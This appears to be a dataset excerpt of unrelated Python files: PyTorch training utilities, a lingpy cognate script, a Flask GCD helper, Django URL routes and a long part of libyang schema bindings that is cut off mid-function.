""" logger.info(f"Number of iterations per epoch: {steps_per_epoch}") if train_config.max_train_steps < 0: # Set max_train_steps based on nepochs max_train_steps = train_config.nepochs * steps_per_epoch train_config.max_train_steps = max_train_steps logger.info( "Number of max_train_steps is set based on nepochs: {}".format( max_train_steps ) ) else: # Set nepochs based on max_train_steps max_train_steps = train_config.max_train_steps epochs = int(np.ceil(max_train_steps / steps_per_epoch)) train_config.nepochs = epochs logger.info( "Number of epochs is set based on max_train_steps: {}".format(epochs) ) logger.info(f"Number of epochs: {train_config.nepochs}") logger.info(f"Number of iterations: {train_config.max_train_steps}") def save_checkpoint( logger, out_dir, model, optimizer, epoch, is_best=False, postfix="" ): """Save a checkpoint. Args: logger (logging.Logger): Logger. out_dir (str): Output directory. model (nn.Module): Model. optimizer (Optimizer): Optimizer. epoch (int): Current epoch. is_best (bool, optional): Whether or not the current model is the best. Defaults to False. postfix (str, optional): Postfix. Defaults to "". """ if isinstance(model, nn.DataParallel): model = model.module out_dir.mkdir(parents=True, exist_ok=True) if is_best: path = out_dir / f"best_loss{postfix}.pth" else: path = out_dir / "epoch{:04d}{}.pth".format(epoch, postfix) torch.save( { "state_dict": model.state_dict(), "optimizer_state": optimizer.state_dict(), }, path, ) logger.info(f"Saved checkpoint at {path}") if not is_best: shutil.copyfile(path, out_dir / f"latest{postfix}.pth") def plot_attention(alignment): """Plot attention. Args: alignment (np.ndarray): Attention. """ fig, ax = plt.subplots() alignment = alignment.cpu().data.numpy().T im = ax.imshow(alignment, aspect="auto", origin="lower", interpolation="none") fig.colorbar(im, ax=ax) plt.xlabel("Decoder time step") plt.ylabel("Encoder time step") return fig def plot_2d_feats(feats, title=None): """Plot 2D features. 
Args: feats (np.ndarray): Input features. title (str, optional): Title. Defaults to None. """ feats = feats.cpu().data.numpy().T fig, ax = plt.subplots() im = ax.imshow( feats, aspect="auto", origin="lower", interpolation="none", cmap="viridis" ) fig.colorbar(im, ax=ax) if title is not None: ax.set_title(title) return fig def setup(config, device, collate_fn): """Setup for traiining Args: config (dict): configuration for training device (torch.device): device to use for training collate_fn (callable): function to collate mini-batches Returns: (tuple): tuple containing model, optimizer, learning rate scheduler, data loaders, tensorboard writer, and logger. .. note:: 書籍に記載のコードは、この関数を一部簡略化しています。 """ # NOTE: hydra は内部で stream logger を追加するので、二重に追加しないことに注意 logger = getLogger(config.verbose, add_stream_handler=False) logger.info(f"PyTorch version: {torch.__version__}") # CUDA 周りの設定 if torch.cuda.is_available(): from torch.backends import cudnn cudnn.benchmark = config.cudnn.benchmark cudnn.deterministic = config.cudnn.deterministic logger.info(f"cudnn.deterministic: {cudnn.deterministic}") logger.info(f"cudnn.benchmark: {cudnn.benchmark}") if torch.backends.cudnn.version() is not None: logger.info(f"cuDNN version: {torch.backends.cudnn.version()}") logger.info(f"Random seed: {config.seed}") init_seed(config.seed) # モデルのインスタンス化 model = hydra.utils.instantiate(config.model.netG).to(device) logger.info(model) logger.info( "Number of trainable params: {:.3f} million".format( num_trainable_params(model) / 1000000.0 ) ) # (optional) 学習済みモデルの読み込み # ファインチューニングしたい場合 pretrained_checkpoint = config.train.pretrained.checkpoint if pretrained_checkpoint is not None and len(pretrained_checkpoint) > 0: logger.info( "Fine-tuning! 
Loading a checkpoint: {}".format(pretrained_checkpoint) ) checkpoint = torch.load(pretrained_checkpoint, map_location=device) model.load_state_dict(checkpoint["state_dict"]) # 複数 GPU 対応 if config.data_parallel: model = nn.DataParallel(model) # Optimizer optimizer_class = getattr(optim, config.train.optim.optimizer.name) optimizer = optimizer_class( model.parameters(), **config.train.optim.optimizer.params ) # 学習率スケジューラ lr_scheduler_class = getattr( optim.lr_scheduler, config.train.optim.lr_scheduler.name ) lr_scheduler = lr_scheduler_class( optimizer, **config.train.optim.lr_scheduler.params ) # DataLoader data_loaders = get_data_loaders(config.data, collate_fn) set_epochs_based_on_max_steps_(config.train, len(data_loaders["train"]), logger) # Tensorboard の設定 writer = SummaryWriter(to_absolute_path(config.train.log_dir)) # config ファイルを保存しておく out_dir = Path(to_absolute_path(config.train.out_dir)) out_dir.mkdir(parents=True, exist_ok=True) with open(out_dir / "model.yaml", "w") as f: OmegaConf.save(config.model, f) with open(out_dir / "config.yaml", "w") as f: OmegaConf.save(config, f) return model, optimizer, lr_scheduler, data_loaders, writer, logger
nilq/baby-python
python
## Licensed under the Apache License, Version 2.0 (the "License"); ## you may not use this file except in compliance with the License. ## You may obtain a copy of the License at ## ## http://www.apache.org/licenses/LICENSE-2.0 ## ## Unless required by applicable law or agreed to in writing, software ## distributed under the License is distributed on an "AS IS" BASIS, ## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. ## See the License for the specific language governing permissions and ## limitations under the License. # Creates a list of potential "cognates" for a pair of languages. # # Assumes you have lingpy (http://lingpy.org/) and tabulate # (https://pypi.org/project/tabulate/) installed. # # Example usage: # # python3 scripts/find_cognates_lingpy.py \ # --language1=French # --language2=Hanunoo # # Output: # # cat /var/tmp/cognates/filtered_cognates_French_Hanunoo # ʒ u ʀ s i r a ŋ from absl import app from absl import flags import collections import csv import os from lingpy import * from tabulate import tabulate flags.DEFINE_string("output_dir", "/var/tmp/cognates", "Output directory") flags.DEFINE_string("language1", None, "Language 1") flags.DEFINE_string("language2", None, "Language 1") flags.DEFINE_string("pairlist", "list_data/cognates.csv", "Pathname of list of cognates extracted for " "the languages in Section 6 of Blevins & Sproat") FLAGS = flags.FLAGS def make_pairlist(path, l1, l2): """Creates pair list for l1 and l2. Args: dir: output directory l1: language 1 l2: language 2 """ pairlist = [] with open(path) as stream: reader = csv.DictReader(stream) for row in reader: if row[l1] == "-" or row[l2] == "-": continue pairlist.append((row["GLOSS"], row[l1], row[l2])) return pairlist def make_initial_cognate_tsv(dir, l1, l2, pairlist): """Collects initial "cognates" for l1 and l2. 
Args: dir: output directory l1: language 1 l2: language 2 pairlist: list of "cognate" pairs of l1, l2 """ filename = "{}/initial_cognates_{}_{}".format(dir, l1, l2) with open(filename, "w") as ostream: ostream.write("# {} <-> {}\n".format(l1, l2)) ostream.write("ID\tTaxon\tGloss\tGlossID\tIPA\tTokens\n") id_ = 1 gloss_id = 1 for (gloss, p1, p2) in pairlist: if gloss == "GLOSS": continue ostream.write("#\n") ostream.write( "{}\t{}\t{}\t{}\t{}\t{}\n".format( id_, l1, gloss, gloss_id, p1.replace(" ", ""), p1)) id_ += 1 ostream.write( "{}\t{}\t{}\t{}\t{}\t{}\n".format( id_, l2, gloss, gloss_id, p2.replace(" ", ""), p2)) id_ += 1 gloss_id += 1 def collect_potential_cognates(dir, l1, l2, threshold=0.55, runs=10000): """Collects potential cognates for l1 and l2. Args: dir: output directory l1: language 1 l2: language 2 threshold: threshold for acceptance of cognate, distance from lex.align_pairs runs: number of runs to perform """ filename = "{}/initial_cognates_{}_{}".format(dir, l1, l2) lex = LexStat(filename) lex.get_scorer(runs=runs) table = [] # He sorts the keys :), so we have to present them in sorted order for keying # into his tables. 
if l2 < l1: L1, L2 = l2, l1 else: L1, L2 = l1, l2 initial_list_len = 0 for key, (idxA, idxB) in enumerate(lex.pairs[L1, L2]): almA, almB, dst = lex.align_pairs(idxA, idxB, mode="overlap", pprint=False) initial_list_len += 1 if dst <= threshold: table += [[ key+1, lex[idxA, "concept"], lex[idxA, "tokens"], lex[idxB, "tokens"], round(dst, 2)]] # Eschew writing this out in tabular format and instead just write out l1 and # l2, one "cognate" per line, so that this can be used directly by # # generate_random_cognate_lists.sh with open("{}/filtered_cognates_{}_{}".format(dir, l1, l2), "w") as stream: for row in table: _, _, l1, l2, _ = row stream.write("{}\t{}\n".format(" ".join(l1), " ".join(l2))) def main(unused_argv): try: os.mkdir(FLAGS.output_dir) except FileExistsError: pass pairlist = make_pairlist(FLAGS.pairlist, FLAGS.language1, FLAGS.language2) make_initial_cognate_tsv(FLAGS.output_dir, FLAGS.language1, FLAGS.language2, pairlist) collect_potential_cognates(FLAGS.output_dir, FLAGS.language1, FLAGS.language2) if __name__ == "__main__": flags.mark_flag_as_required("language1") flags.mark_flag_as_required("language2") app.run(main)
nilq/baby-python
python
from flask import flash def Euclidean_Algorithm(number_x, number_y): try: x, y = int(number_x), int(number_y) r = x % y while r > 0: x = y y = r r = x % y else: gcd = y anser = str(number_x)+"と"+str(number_y)+"の最大公約数は"+str(gcd) except: anser = "Error" flash("エラー:もう一度入力してください") return anser
nilq/baby-python
python
def extract_json(html):
nilq/baby-python
python
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE from __future__ import absolute_import from awkward._ext import fromjson from awkward._ext import uproot_issue_90
nilq/baby-python
python
from django.urls import path #from account.forms import LoginForm from django.views.generic.base import TemplateView # new from . import views app_name = 'home' urlpatterns = [ #ex: /roster/ path('', views.index, name='index'), path('coachhome/<int:pk>', views.coachhome.as_view(template_name='coachhome.html'), name='coachhome'), path('coachhome/1',views.coachhome.as_view(template_name='coachhome.html')), path('coachhome/2',views.coachhome.as_view(template_name='coachhome.html')), path('coachhome/3',views.coachhome.as_view(template_name='coachhome.html')), # ne path('coachhome/subs',views.coachhome.as_view(template_name='coachhome.html')), path('coachhome/shot',views.coachhome.as_view(template_name = 'coachhome.html')), path('coachhome/stat',views.coachhome.as_view(template_name='coachhome.html')), path('coachhome/event', views.statEvent, name='statEvent'), path('coachhome/analytics/<int:pk>', views.analytics.as_view(template_name= 'analytics.html'), name='analytics'), ]
nilq/baby-python
python
# Copyright (c) 2018-2019 Robin Jarry # SPDX-License-Identifier: BSD-3-Clause from _libyang import ffi from _libyang import lib from .util import c2str from .util import str2c #------------------------------------------------------------------------------ def schema_in_format(fmt_string): if fmt_string == 'yang': return lib.LYS_IN_YANG if fmt_string == 'yin': return lib.LYS_IN_YIN raise ValueError('unknown schema input format: %r' % fmt_string) #------------------------------------------------------------------------------ def schema_out_format(fmt_string): if fmt_string == 'yang': return lib.LYS_OUT_YANG if fmt_string == 'yin': return lib.LYS_OUT_YIN if fmt_string == 'tree': return lib.LYS_OUT_TREE if fmt_string == 'info': return lib.LYS_OUT_INFO if fmt_string == 'json': return lib.LYS_OUT_JSON raise ValueError('unknown schema output format: %r' % fmt_string) #------------------------------------------------------------------------------ class Module: def __init__(self, context, module_p): self.context = context self._module = module_p def name(self): return c2str(self._module.name) def prefix(self): return c2str(self._module.prefix) def description(self): return c2str(self._module.dsc) def filepath(self): return c2str(self._module.filepath) def implemented(self): return bool(lib.lypy_module_implemented(self._module)) def feature_enable(self, name): ret = lib.lys_features_enable(self._module, str2c(name)) if ret != 0: raise self.context.error('no such feature: %r' % name) def feature_enable_all(self): self.feature_enable('*') def feature_disable(self, name): ret = lib.lys_features_disable(self._module, str2c(name)) if ret != 0: raise self.context.error('no such feature: %r' % name) def feature_disable_all(self): self.feature_disable('*') def feature_state(self, name): ret = lib.lys_features_state(self._module, str2c(name)) if ret < 0: raise self.context.error('no such feature: %r' % name) return bool(ret) def features(self): for i in 
range(self._module.features_size): yield Feature(self.context, self._module.features[i]) def get_feature(self, name): for f in self.features(): if f.name() == name: return f raise self.context.error('no such feature: %r' % name) def revisions(self): for i in range(self._module.rev_size): yield Revision(self.context, self._module.rev[i]) def __iter__(self): return self.children() def children(self, types=None): return iter_children(self.context, self._module, types=types) def __str__(self): return self.name() def print_mem(self, fmt='tree', path=None): fmt = schema_out_format(fmt) buf = ffi.new('char **') ret = lib.lys_print_mem(buf, self._module, fmt, str2c(path), 0, 0) if ret != 0: raise self.context.error('cannot print module') try: return c2str(buf[0]) finally: lib.free(buf[0]) def print_file(self, fileobj, fmt='tree', path=None): fmt = schema_out_format(fmt) ret = lib.lys_print_fd( fileobj.fileno(), self._module, fmt, str2c(path), 0, 0) if ret != 0: raise self.context.error('cannot print module') def parse_data_dict(self, dic, parent=None, rpc_input=False, rpc_output=False): """ Convert a python dictionary to a DNode object following the schema of this module. The returned value is always a top-level data node (i.e.: without parent). :arg dict dic: The python dictionary to convert. :arg DNode parent: Optional parent to update. If not specified a new top-level DNode will be created. :arg bool rpc_input: If True, dic will be parsed by looking in the rpc input nodes. :arg bool rpc_output: If True, dic will be parsed by looking in the rpc output nodes. 
""" from .data import dict_to_dnode # circular import return dict_to_dnode(dic, self, parent=parent, rpc_input=rpc_input, rpc_output=rpc_output) #------------------------------------------------------------------------------ class Revision: def __init__(self, context, rev_p): self.context = context self._rev = rev_p def date(self): return c2str(self._rev.date) def description(self): return c2str(self._rev.dsc) def reference(self): return c2str(self._rev.ref) def extensions(self): for i in range(self._rev.ext_size): yield Extension(self.context, self._rev.ext[i]) def get_extension(self, name, prefix=None, arg_value=None): for ext in self.extensions(): if ext.name() != name: continue if prefix is not None and ext.module().name() != prefix: continue if arg_value is not None and ext.argument() != arg_value: continue return ext return None def __repr__(self): cls = self.__class__ return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self)) def __str__(self): return self.date() #------------------------------------------------------------------------------ class Extension: def __init__(self, context, ext_p): self.context = context self._ext = ext_p self._def = getattr(ext_p, 'def') def name(self): return c2str(self._def.name) def argument(self): return c2str(self._ext.arg_value) def module(self): module_p = lib.lys_main_module(self._def.module) if not module_p: raise self.context.error('cannot get module') return Module(self.context, module_p) def __repr__(self): cls = self.__class__ return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self)) def __str__(self): return self.name() #------------------------------------------------------------------------------ class Type: DER = lib.LY_TYPE_DER BINARY = lib.LY_TYPE_BINARY BITS = lib.LY_TYPE_BITS BOOL = lib.LY_TYPE_BOOL DEC64 = lib.LY_TYPE_DEC64 EMPTY = lib.LY_TYPE_EMPTY ENUM = lib.LY_TYPE_ENUM IDENT = lib.LY_TYPE_IDENT INST = lib.LY_TYPE_INST LEAFREF = lib.LY_TYPE_LEAFREF STRING = lib.LY_TYPE_STRING UNION = 
lib.LY_TYPE_UNION INT8 = lib.LY_TYPE_INT8 UINT8 = lib.LY_TYPE_UINT8 INT16 = lib.LY_TYPE_INT16 UINT16 = lib.LY_TYPE_UINT16 INT32 = lib.LY_TYPE_INT32 UINT32 = lib.LY_TYPE_UINT32 INT64 = lib.LY_TYPE_INT64 UINT64 = lib.LY_TYPE_UINT64 BASENAMES = { DER: 'derived', BINARY: 'binary', BITS: 'bits', BOOL: 'boolean', DEC64: 'decimal64', EMPTY: 'empty', ENUM: 'enumeration', IDENT: 'identityref', INST: 'instance-id', LEAFREF: 'leafref', STRING: 'string', UNION: 'union', INT8: 'int8', UINT8: 'uint8', INT16: 'int16', UINT16: 'uint16', INT32: 'int32', UINT32: 'uint32', INT64: 'int64', UINT64: 'uint64', } def __init__(self, context, type_p): self.context = context self._type = type_p def get_bases(self): if self._type.base == lib.LY_TYPE_DER: yield from self.derived_type().get_bases() elif self._type.base == lib.LY_TYPE_LEAFREF: yield from self.leafref_type().get_bases() elif self._type.base == lib.LY_TYPE_UNION: for t in self.union_types(): yield from t.get_bases() else: # builtin type yield self def name(self): if self._type.der: return c2str(self._type.der.name) return self.basename() def description(self): if self._type.der: return c2str(self._type.der.dsc) return None def base(self): return self._type.base def bases(self): for b in self.get_bases(): yield b.base() def basename(self): return self.BASENAMES.get(self._type.base, 'unknown') def basenames(self): for b in self.get_bases(): yield b.basename() def derived_type(self): if not self._type.der: return None return Type(self.context, ffi.addressof(self._type.der.type)) def leafref_type(self): if self._type.base != self.LEAFREF: return None lref = self._type.info.lref return Type(self.context, ffi.addressof(lref.target.type)) def union_types(self): if self._type.base != self.UNION: return t = self._type while t.info.uni.count == 0: t = ffi.addressof(t.der.type) for i in range(t.info.uni.count): yield Type(self.context, t.info.uni.types[i]) def enums(self): if self._type.base != self.ENUM: return t = self._type while 
t.info.enums.count == 0: t = ffi.addressof(t.der.type) for i in range(t.info.enums.count): e = t.info.enums.enm[i] yield c2str(e.name), c2str(e.dsc) def all_enums(self): for b in self.get_bases(): yield from b.enums() def bits(self): if self._type.base != self.BITS: return t = self._type while t.info.bits.count == 0: t = ffi.addressof(t.der.type) for i in range(t.info.bits.count): b = t.info.bits.bit[i] yield c2str(b.name), c2str(b.dsc) def all_bits(self): for b in self.get_bases(): yield from b.bits() NUM_TYPES = frozenset( (INT8, INT16, INT32, INT64, UINT8, UINT16, UINT32, UINT64)) def range(self): if self._type.base in self.NUM_TYPES and self._type.info.num.range: return c2str(self._type.info.num.range.expr) elif self._type.base == self.DEC64 and self._type.info.dec64.range: return c2str(self._type.info.dec64.range.expr) elif self._type.der: return self.derived_type().range() return None def all_ranges(self): if self._type.base == lib.LY_TYPE_UNION: for t in self.union_types(): yield from t.all_ranges() else: rng = self.range() if rng is not None: yield rng def length(self): if self._type.base == self.STRING and self._type.info.str.length: return c2str(self._type.info.str.length.expr) elif self._type.base == self.BINARY and self._type.info.binary.length: return c2str(self._type.info.binary.length.expr) elif self._type.der: return self.derived_type().length() return None def all_lengths(self): if self._type.base == lib.LY_TYPE_UNION: for t in self.union_types(): yield from t.all_lengths() else: length = self.length() if length is not None: yield length def patterns(self): if self._type.base != self.STRING: return for i in range(self._type.info.str.pat_count): p = self._type.info.str.patterns[i] if not p: continue # in case of pattern restriction, the first byte has a special # meaning: 0x06 (ACK) for regular match and 0x15 (NACK) for # invert-match invert_match = p.expr[0] == 0x15 # yield tuples like: # ('[a-zA-Z_][a-zA-Z0-9\-_.]*', False) # ('[xX][mM][lL].*', 
True) yield c2str(p.expr + 1), invert_match if self._type.der: yield from self.derived_type().patterns() def all_patterns(self): if self._type.base == lib.LY_TYPE_UNION: for t in self.union_types(): yield from t.all_patterns() else: yield from self.patterns() def module(self): module_p = lib.lys_main_module(self._type.der.module) if not module_p: raise self.context.error('cannot get module') return Module(self.context, module_p) def extensions(self): for i in range(self._type.ext_size): yield Extension(self.context, self._type.ext[i]) if self._type.parent: for i in range(self._type.parent.ext_size): yield Extension(self.context, self._type.parent.ext[i]) def get_extension(self, name, prefix=None, arg_value=None): for ext in self.extensions(): if ext.name() != name: continue if prefix is not None and ext.module().name() != prefix: continue if arg_value is not None and ext.argument() != arg_value: continue return ext return None def __repr__(self): cls = self.__class__ return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self)) def __str__(self): return self.name() #------------------------------------------------------------------------------ class Feature: def __init__(self, context, feature_p): self.context = context self._feature = feature_p def name(self): return c2str(self._feature.name) def description(self): return c2str(self._feature.dsc) def reference(self): return c2str(self._feature.ref) def state(self): return bool(self._feature.flags & lib.LYS_FENABLED) def deprecated(self): return bool(self._feature.flags & lib.LYS_STATUS_DEPRC) def obsolete(self): return bool(self._feature.flags & lib.LYS_STATUS_OBSLT) def if_features(self): for i in range(self._feature.iffeature_size): yield IfFeatureExpr(self.context, self._feature.iffeature[i]) def module(self): module_p = lib.lys_main_module(self._feature.module) if not module_p: raise self.context.error('cannot get module') return Module(self.context, module_p) def __str__(self): return self.name() 
#------------------------------------------------------------------------------ class IfFeatureExpr: def __init__(self, context, iffeature_p): self.context = context self._iffeature = iffeature_p def _get_operator(self, position): # the ->exp field is a 2bit array of operator values stored under # a uint8_t C array. mask = 0x3 # 2bits mask shift = 2 * (position % 4) item = self._iffeature.expr[position // 4] result = item & (mask << shift) return result >> shift def _operands(self): op_index = 0 ft_index = 0 expected = 1 while expected > 0: operator = self._get_operator(op_index) op_index += 1 if operator == lib.LYS_IFF_F: yield IfFeature(self.context, self._iffeature.features[ft_index]) ft_index += 1 expected -= 1 elif operator == lib.LYS_IFF_NOT: yield IfNotFeature elif operator == lib.LYS_IFF_AND: yield IfAndFeatures expected += 1 elif operator == lib.LYS_IFF_OR: yield IfOrFeatures expected += 1 def tree(self): def _tree(operands): op = next(operands) if op is IfNotFeature: return op(self.context, _tree(operands)) elif op in (IfAndFeatures, IfOrFeatures): return op(self.context, _tree(operands), _tree(operands)) else: return op return _tree(self._operands()) def dump(self): return self.tree().dump() def __str__(self): return str(self.tree()).strip('()') #------------------------------------------------------------------------------ class IfFeatureExprTree: def dump(self, indent=0): raise NotImplementedError() def __str__(self): raise NotImplementedError() #------------------------------------------------------------------------------ class IfFeature(IfFeatureExprTree): def __init__(self, context, feature_p): self.context = context self._feature = feature_p def feature(self): return Feature(self.context, self._feature) def dump(self, indent=0): feat = self.feature() return '%s%s [%s]\n' % (' ' * indent, feat.name(), feat.description()) def __str__(self): return self.feature().name() #------------------------------------------------------------------------------ 
class IfNotFeature(IfFeatureExprTree):
    """Unary NOT node of an if-feature expression tree."""

    def __init__(self, context, child):
        self.context = context
        self.child = child

    def dump(self, indent=0):
        return ' ' * indent + 'NOT\n' + self.child.dump(indent + 1)

    def __str__(self):
        return 'NOT %s' % self.child


#------------------------------------------------------------------------------
class IfAndFeatures(IfFeatureExprTree):
    """Binary AND node of an if-feature expression tree."""

    def __init__(self, context, a, b):
        self.context = context
        self.a = a
        self.b = b

    def dump(self, indent=0):
        s = ' ' * indent + 'AND\n'
        s += self.a.dump(indent + 1)
        s += self.b.dump(indent + 1)
        return s

    def __str__(self):
        return '%s AND %s' % (self.a, self.b)


#------------------------------------------------------------------------------
class IfOrFeatures(IfFeatureExprTree):
    """Binary OR node of an if-feature expression tree.

    Parenthesized in __str__ so OR precedence stays explicit when nested.
    """

    def __init__(self, context, a, b):
        self.context = context
        self.a = a
        self.b = b

    def dump(self, indent=0):
        s = ' ' * indent + 'OR\n'
        s += self.a.dump(indent + 1)
        s += self.b.dump(indent + 1)
        return s

    def __str__(self):
        return '(%s OR %s)' % (self.a, self.b)


#------------------------------------------------------------------------------
class SNode:
    """Base wrapper for a libyang schema node (``struct lys_node``).

    Concrete node kinds (leaf, list, container, rpc, ...) subclass this and
    register themselves in NODETYPE_CLASS via the @SNode.register decorator;
    SNode.new() then dispatches on the C node's nodetype.
    """

    CONTAINER = lib.LYS_CONTAINER
    LEAF = lib.LYS_LEAF
    LEAFLIST = lib.LYS_LEAFLIST
    LIST = lib.LYS_LIST
    RPC = lib.LYS_RPC
    INPUT = lib.LYS_INPUT
    OUTPUT = lib.LYS_OUTPUT
    # YANG statement keyword for each supported node type
    KEYWORDS = {
        CONTAINER: 'container',
        LEAF: 'leaf',
        LEAFLIST: 'leaf-list',
        LIST: 'list',
        RPC: 'rpc',
        INPUT: 'input',
        OUTPUT: 'output',
    }

    def __init__(self, context, node_p):
        self.context = context
        self._node = node_p

    def nodetype(self):
        """Return the raw LYS_* node type constant."""
        return self._node.nodetype

    def keyword(self):
        """Return the YANG keyword for this node, or '???' if unknown."""
        return self.KEYWORDS.get(self._node.nodetype, '???')

    def name(self):
        return c2str(self._node.name)

    def fullname(self):
        """Return the node name qualified by its module: 'module:name'."""
        return '%s:%s' % (self.module().name(), self.name())

    def description(self):
        return c2str(self._node.dsc)

    def config_set(self):
        """True if a config statement was explicitly set on this node."""
        return bool(self._node.flags & lib.LYS_CONFIG_SET)

    def config_false(self):
        """True if this node is state data (config false)."""
        return bool(self._node.flags & lib.LYS_CONFIG_R)

    def mandatory(self):
        return bool(self._node.flags & lib.LYS_MAND_TRUE)

    def deprecated(self):
        return bool(self._node.flags & lib.LYS_STATUS_DEPRC)

    def obsolete(self):
        return bool(self._node.flags & lib.LYS_STATUS_OBSLT)

    def status(self):
        """Return the YANG status string: 'deprecated', 'obsolete' or 'current'."""
        if self._node.flags & lib.LYS_STATUS_DEPRC:
            return 'deprecated'
        elif self._node.flags & lib.LYS_STATUS_OBSLT:
            return 'obsolete'
        return 'current'

    def module(self):
        """Return the main module this node belongs to.

        :raises: the context's error if libyang cannot resolve the module.
        """
        module_p = lib.lys_node_module(self._node)
        if not module_p:
            raise self.context.error('cannot get module')
        return Module(self.context, module_p)

    def schema_path(self):
        """Return the schema path of this node as a string.

        The C string returned by lys_path is heap-allocated and freed here.
        NOTE(review): if lys_path itself raised, `s` would be unbound in the
        finally clause — presumed unreachable via cffi, but worth confirming.
        """
        try:
            s = lib.lys_path(self._node, 0)
            return c2str(s)
        finally:
            lib.free(s)

    def data_path(self, key_placeholder="'%s'"):
        """Return a data path pattern for this node.

        :arg str key_placeholder:
            Format inserted for each list key (default: quoted %s).
        """
        try:
            s = lib.lys_data_path_pattern(self._node, str2c(key_placeholder))
            return c2str(s)
        finally:
            lib.free(s)

    def extensions(self):
        """Yield Extension objects attached to this node."""
        for i in range(self._node.ext_size):
            yield Extension(self.context, self._node.ext[i])

    def get_extension(self, name, prefix=None, arg_value=None):
        """Return the first extension matching name (and optionally
        module prefix and argument value), or None."""
        for ext in self.extensions():
            if ext.name() != name:
                continue
            if prefix is not None and ext.module().name() != prefix:
                continue
            if arg_value is not None and ext.argument() != arg_value:
                continue
            return ext
        return None

    def if_features(self):
        """Yield IfFeatureExpr objects guarding this node."""
        for i in range(self._node.iffeature_size):
            yield IfFeatureExpr(self.context, self._node.iffeature[i])

    def parent(self):
        """Return the closest ancestor of a supported node type, or None.

        Unsupported intermediate node types (e.g. choice/case) are skipped.
        """
        parent_p = lib.lys_parent(self._node)
        while parent_p and parent_p.nodetype not in SNode.NODETYPE_CLASS:
            parent_p = lib.lys_parent(parent_p)
        if parent_p:
            return SNode.new(self.context, parent_p)
        return None

    def __repr__(self):
        cls = self.__class__
        return '<%s.%s: %s>' % (cls.__module__, cls.__name__, str(self))

    def __str__(self):
        return self.name()

    def parse_data_dict(self, dic, parent=None,
                        rpc_input=False, rpc_output=False):
        """
        Convert a python dictionary to a DNode object following the schema of
        this module. The returned value is always a top-level data node (i.e.:
        without parent).

        :arg dict dic:
            The python dictionary to convert.
        :arg DNode parent:
            Optional parent to update. If not specified a new top-level DNode
            will be created.
        :arg bool rpc_input:
            If True, dic will be parsed by looking in the rpc input nodes.
        :arg bool rpc_output:
            If True, dic will be parsed by looking in the rpc output nodes.
        """
        from .data import dict_to_dnode  # circular import
        return dict_to_dnode(dic, self, parent=parent,
                             rpc_input=rpc_input, rpc_output=rpc_output)

    # nodetype constant -> SNode subclass, populated by @SNode.register
    NODETYPE_CLASS = {}

    @classmethod
    def register(cls, nodetype):
        """Class decorator: map `nodetype` to the decorated subclass."""
        def _decorator(nodeclass):
            cls.NODETYPE_CLASS[nodetype] = nodeclass
            return nodeclass
        return _decorator

    @classmethod
    def new(cls, context, node_p):
        """Factory: wrap node_p in the registered subclass (SNode fallback)."""
        nodecls = cls.NODETYPE_CLASS.get(node_p.nodetype, SNode)
        return nodecls(context, node_p)


#------------------------------------------------------------------------------
@SNode.register(SNode.LEAF)
class SLeaf(SNode):
    """Schema wrapper for a YANG leaf node."""

    def __init__(self, context, node_p):
        super().__init__(context, node_p)
        self._leaf = ffi.cast('struct lys_node_leaf *', node_p)

    def default(self):
        return c2str(self._leaf.dflt)

    def units(self):
        return c2str(self._leaf.units)

    def type(self):
        return Type(self.context, ffi.addressof(self._leaf.type))

    def is_key(self):
        """True if this leaf is a key of its parent list."""
        if lib.lys_is_key(self._leaf, ffi.NULL):
            return True
        return False

    def must_conditions(self):
        """Yield the XPath expressions of the leaf's must statements."""
        for i in range(self._leaf.must_size):
            yield c2str(self._leaf.must[i].expr)

    def __str__(self):
        return '%s %s' % (self.name(), self.type().name())


#------------------------------------------------------------------------------
@SNode.register(SNode.LEAFLIST)
class SLeafList(SNode):
    """Schema wrapper for a YANG leaf-list node."""

    def __init__(self, context, node_p):
        super().__init__(context, node_p)
        self._leaflist = ffi.cast('struct lys_node_leaflist *', node_p)

    def ordered(self):
        """True if the leaf-list is ordered-by user."""
        return bool(self._node.flags & lib.LYS_USERORDERED)

    def units(self):
        return c2str(self._leaflist.units)

    def type(self):
        return Type(self.context, ffi.addressof(self._leaflist.type))

    def defaults(self):
        """Yield the default values of the leaf-list."""
        for i in range(self._leaflist.dflt_size):
            yield c2str(self._leaflist.dflt[i])

    def must_conditions(self):
        for i in range(self._leaflist.must_size):
            yield c2str(self._leaflist.must[i].expr)

    def __str__(self):
        return '%s %s' % (self.name(), self.type().name())


#------------------------------------------------------------------------------
@SNode.register(SNode.CONTAINER)
class SContainer(SNode):
    """Schema wrapper for a YANG container node."""

    def __init__(self, context, node_p):
        super().__init__(context, node_p)
        self._container = ffi.cast('struct lys_node_container *', node_p)

    def presence(self):
        """Return the presence statement text, or None for non-presence."""
        return c2str(self._container.presence)

    def must_conditions(self):
        for i in range(self._container.must_size):
            yield c2str(self._container.must[i].expr)

    def __iter__(self):
        return self.children()

    def children(self, types=None):
        return iter_children(self.context, self._node, types=types)


#------------------------------------------------------------------------------
@SNode.register(SNode.LIST)
class SList(SNode):
    """Schema wrapper for a YANG list node."""

    def __init__(self, context, node_p):
        super().__init__(context, node_p)
        self._list = ffi.cast('struct lys_node_list *', node_p)

    def ordered(self):
        """True if the list is ordered-by user."""
        return bool(self._node.flags & lib.LYS_USERORDERED)

    def __iter__(self):
        return self.children()

    def children(self, skip_keys=False, types=None):
        return iter_children(
            self.context, self._node, skip_keys=skip_keys, types=types)

    def keys(self):
        """Yield the key leafs of this list as SLeaf objects."""
        for i in range(self._list.keys_size):
            node = ffi.cast('struct lys_node *', self._list.keys[i])
            yield SLeaf(self.context, node)

    def must_conditions(self):
        for i in range(self._list.must_size):
            yield c2str(self._list.must[i].expr)

    def __str__(self):
        return '%s [%s]' % (
            self.name(), ', '.join(k.name() for k in self.keys()))


#------------------------------------------------------------------------------
@SNode.register(SNode.INPUT)
@SNode.register(SNode.OUTPUT)
class SRpcInOut(SNode):
    """Schema wrapper for an RPC input or output node."""

    def __iter__(self):
        return self.children()

    def must_conditions(self):
        # input/output nodes carry no must statements
        return ()

    def children(self, types=None):
        return iter_children(self.context, self._node, types=types)


#------------------------------------------------------------------------------
@SNode.register(SNode.RPC)
class SRpc(SNode):
    """Schema wrapper for a YANG rpc node."""

    def must_conditions(self):
        return ()

    def input(self):
        """Return the rpc input node, or None if it has none."""
        try:
            return next(iter_children(
                self.context, self._node, types=(self.INPUT,),
